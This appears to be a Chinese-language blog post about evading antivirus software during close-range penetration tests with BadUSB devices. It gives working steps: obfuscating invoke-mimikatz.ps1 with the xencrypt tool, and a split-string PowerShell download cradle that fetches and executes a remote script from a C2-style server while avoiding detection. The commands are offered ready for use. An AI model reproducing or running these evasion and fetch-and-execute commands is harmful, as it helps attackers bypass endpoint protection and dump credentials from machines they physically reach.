关于近源渗透测试的免杀

近源渗透测试badusb执行代码的免杀

在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。
关于近源渗透测试的免杀

生成powershell payload

如图生成payload,我们使用powershell的payload,就不用勾选64位了
关于近源渗透测试的免杀

powershell混淆

接下来做混淆,否则ps脚本下载下来也是被杀软秒杀的,可以使用InvokeObfuscation或者xencrypt。
我这里使用的是xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68

可以选择免杀68次
https://github.com/the-xentropy/xencrypt

badusb运行脚本拆分免杀

由于免杀后的脚本会很大,所以我们可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")从服务器下载ps脚本运行,但是会被杀软杀,所以可以用拆分免杀。

powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""
上一篇:jquery的$.extend和$.fn.extend作用及区别/用span实现进度条/腾讯云IIS端口号修改


下一篇:将上次命令执行是否成功的返回值放到提示符里面去